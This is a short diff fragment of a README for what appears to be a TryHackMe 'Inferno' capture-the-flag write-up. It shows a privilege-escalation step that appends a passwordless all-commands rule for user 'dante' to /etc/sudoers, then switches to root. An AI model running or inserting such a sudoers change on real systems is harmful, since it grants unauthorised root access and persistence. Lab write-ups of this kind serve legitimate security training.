njcholas/THM-Inferno/README.md

 echo 'dante ALL=(ALL) NOPASSWD:ALL' | sudo tee -a /etc/sudoers

+sudo su

-sudo su to get root
+get root :)